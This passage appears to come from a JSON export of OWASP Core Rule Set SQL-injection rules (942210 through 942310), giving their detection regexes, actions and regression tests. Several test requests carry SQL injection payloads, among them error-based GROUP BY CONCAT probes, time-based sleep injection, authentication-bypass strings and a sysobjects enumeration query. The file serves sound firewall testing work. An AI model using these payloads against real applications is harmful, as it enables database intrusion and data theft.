"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%26%26+1%3D%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%26%26+1%3D%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 69, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=OR backend_layout= '" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=OR backend_layout= '" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 70, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=--alter" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=--alter" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 71, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=AND (name = \"" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=AND (name = \"" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 72, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=OR name = \"" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=OR name = \"" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 73, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=AND ( name = \"" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=AND ( name = \"" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 74, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=4oR2-" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=4oR2-" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 75, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=AND engine = '" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=AND engine = '" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 76, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=and code != \"" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=and code != \"" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 77, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=and freigabe = \"" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=and freigabe = \"" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 78, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=AND 6698=(" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=AND 6698=(" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 79, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=or class!=\"" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=or class!=\"" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 80, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=or 4975==4975'" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=or 4975==4975'" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 81, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=1 GROUP BY CONCAT(0x7162766a71,(SELECT (CASE WHEN (5554=5554) THEN 1 ELSE 0 END)),0x7171786271,FLOOR(RAND(0)*2)) HAVING MIN(" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=1 GROUP BY CONCAT(0x7162766a71,(SELECT (CASE WHEN (5554=5554) THEN 1 ELSE 0 END)),0x7171786271,FLOOR(RAND(0)*2)) HAVING MIN(" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 863, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:&&|\\|\\||and|between|div|like|n(?:and|ot)|(?:xx?)?or)[\\s\\x0b\\(]+[0-9A-Z_a-z]+[\\s\\x0b\\)]*?[!\\+=]+[\\s\\x0b0-9]*?[\\\"'-\\)=`]|[0-9](?:[\\s\\x0b]*?(?:and|between|div|like|x?or)[\\s\\x0b]*?[0-9]+[\\s\\x0b]*?[\\+\\-]|[\\s\\x0b]+group[\\s\\x0b]+by.+\\()|/[0-9A-Z_a-z]+;?[\\s\\x0b]+(?:and|between|div|having|like|x?or|select)[^0-9A-Z_a-z]|(?:[#;]|--)[\\s\\x0b]*?(?:alter|drop|(?:insert|update)[\\s\\x0b]*?[0-9A-Z_a-z]{2,})|@.+=[\\s\\x0b]*?\\([\\s\\x0b]*?select|[^0-9A-Z_a-z]SET[\\s\\x0b]*?@[0-9A-Z_a-z]+", "actions": [ { "act_name": "id", "lineno": 864, "act_quote": "no_quote", "act_arg": "942210", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 865, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 866, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 867, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 868, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 868, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 869, "act_quote": "quotes", "act_arg": "Detects chained SQL injection attempts 1/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 870, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 871, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 872, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 873, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 874, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 875, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 876, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 877, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 878, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 879, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 880, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 881, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 882, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 863 } }, { "rule_id": "942260", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\\"'`][\\s\\x0b]*?(?:(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\\|\\||&&)[\\s\\x0b]+[\\s\\x0b0-9A-Z_a-z]+=[\\s\\x0b]*?[0-9A-Z_a-z]+[\\s\\x0b]*?having[\\s\\x0b]+|like[^0-9A-Z_a-z]*?[\\\"'0-9`])|[0-9A-Z_a-z][\\s\\x0b]+like[\\s\\x0b]+[\\\"'`]|like[\\s\\x0b]*?[\\\"'`]%|select[\\s\\x0b]+?[\\s\\x0b\\\"'-\\),-\\.0-9A-\\[\\]_-z]+from[\\s\\x0b]+", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL authentication bypass attempts 2/3", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Basic SQL authentication bypass", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=something%20LIKE%20%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942260 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=something%20LIKE%20%27" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 889, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\\"'`][\\s\\x0b]*?(?:(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\\|\\||&&)[\\s\\x0b]+[\\s\\x0b0-9A-Z_a-z]+=[\\s\\x0b]*?[0-9A-Z_a-z]+[\\s\\x0b]*?having[\\s\\x0b]+|like[^0-9A-Z_a-z]*?[\\\"'0-9`])|[0-9A-Z_a-z][\\s\\x0b]+like[\\s\\x0b]+[\\\"'`]|like[\\s\\x0b]*?[\\\"'`]%|select[\\s\\x0b]+?[\\s\\x0b\\\"'-\\),-\\.0-9A-\\[\\]_-z]+from[\\s\\x0b]+", "actions": [ { "act_name": "id", "lineno": 890, "act_quote": "no_quote", "act_arg": "942260", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 891, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 892, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 893, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 894, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 894, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 895, "act_quote": "quotes", "act_arg": "Detects basic SQL authentication bypass attempts 2/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 896, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 897, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 898, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 899, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 900, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 901, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 902, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 903, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 904, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 905, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 906, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 907, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 908, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 889 } }, { "rule_id": "942300", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\)[\\s\\x0b]*?when[\\s\\x0b]*?[0-9]+[\\s\\x0b]*?then|[\\\"'`][\\s\\x0b]*?(?:[#\\{]|--)|/\\*![\\s\\x0b]?[0-9]+|\\b(?:(?:binary|cha?r)[\\s\\x0b]*?\\([\\s\\x0b]*?[0-9]|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|r(?:egexp|like))[\\s\\x0b]+[0-9A-Z_a-z]+\\()|(?:\\|\\||&&)[\\s\\x0b]*?[0-9A-Z_a-z]+\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects MySQL comments, conditions and ch(a)r injections", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "MySQL comments, conditions and ch(a)r injectionss", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=) when 234 then&foo=bar" }, "expected": { "should_block": true, "rule_ids": [ 942300 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=) when 234 then&foo=bar" } ] }, { "description": "MySQL comments, conditions and ch(a)r injectionss", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=) when 234 then&foo=bar" }, "expected": { "should_block": true, "rule_ids": [ 942300 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=) when 234 then&foo=bar" } ] }, { "description": "No false positives with for. Issue #2007", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=booked%20for%202021%28including%202020" }, "expected": { "should_block": false, "rule_ids": [ 942300 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=booked%20for%202021%28including%202020" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 915, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\)[\\s\\x0b]*?when[\\s\\x0b]*?[0-9]+[\\s\\x0b]*?then|[\\\"'`][\\s\\x0b]*?(?:[#\\{]|--)|/\\*![\\s\\x0b]?[0-9]+|\\b(?:(?:binary|cha?r)[\\s\\x0b]*?\\([\\s\\x0b]*?[0-9]|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|r(?:egexp|like))[\\s\\x0b]+[0-9A-Z_a-z]+\\()|(?:\\|\\||&&)[\\s\\x0b]*?[0-9A-Z_a-z]+\\(", "actions": [ { "act_name": "id", "lineno": 916, "act_quote": "no_quote", "act_arg": "942300", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 917, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 918, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 919, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 920, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 920, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 921, "act_quote": "quotes", "act_arg": "Detects MySQL comments, conditions and ch(a)r injections", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 922, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 923, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 924, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 925, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 926, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 927, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 928, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 929, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 930, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 931, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 932, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 933, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 934, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 915 } }, { "rule_id": "942310", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)(?:\\([\\s\\x0b]*?select[\\s\\x0b]*?[0-9A-Z_a-z]+|coalesce|order[\\s\\x0b]+by[\\s\\x0b]+if[0-9A-Z_a-z]*?)[\\s\\x0b]*?\\(|\\*/from|\\+[\\s\\x0b]*?[0-9]+[\\s\\x0b]*?\\+[\\s\\x0b]*?@|[0-9A-Z_a-z][\\\"'`][\\s\\x0b]*?(?:(?:[\\+\\-=@\\|]+[\\s\\x0b]+?)+|[\\+\\-=@\\|]+)[\\(0-9]|@@[0-9A-Z_a-z]+[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z]|[^0-9A-Z_a-z]!+[\\\"'`][0-9A-Z_a-z]|[\\\"'`](?:;[\\s\\x0b]*?(?:if|while|begin)|[\\s\\x0b0-9]+=[\\s\\x0b]*?[0-9])|[\\s\\x0b\\(]+case[0-9]*?[^0-9A-Z_a-z].+[tw]hen[\\s\\x0b\\(]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects chained SQL injection attempts 2/2", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Chained SQL injection attempts 2/2.\nThis test originally checked the expression `[\\\"'`]\\s+and\\s*?=\\W`. We opted to remove that expression as it\ndoes not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118).\nThis test now checks that no match occurs for something that would have matched the original expression.\n", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=%22%27%20and%20%3d%20bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942310 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%22%27%20and%20%3d%20bar" } ] }, { "description": "Chained SQL injection attempts 2/2.\nThis test checks for a positive match of `\\(\\s*?select\\s*?\\w+\\s*?\\(`.\n", "test_id": 2, "request": { "method": "GET", "uri": "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942310 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" } ] }, { "description": "Chained SQL injection attempts 2/2.\nThis test checks for a positive match of `order\\s+by\\s+if\\w*?\\s*?\\(`.\n", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942310 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=order%20by%20if(1%3D1%2C1%2Csleep(1))" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 941, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false 